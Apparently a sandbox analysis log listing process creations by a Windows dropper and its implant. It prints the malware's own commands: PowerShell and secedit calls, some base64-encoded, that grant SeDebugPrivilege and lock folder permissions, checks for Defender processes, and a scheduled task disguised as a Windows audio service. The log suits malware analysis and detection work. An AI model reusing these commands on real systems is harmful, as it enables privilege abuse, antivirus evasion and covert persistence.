                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\inst.ini
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\ProgramData\Program\iusb3mon.exe C:\ProgramData\program\iusb3mon.exe
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\Desktop\Lets-x64.exe   Process created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe   Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe   Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe   Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe   Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe   Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe   Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe   Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe   Process created: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe   Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe   Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe   Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\inst.ini
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
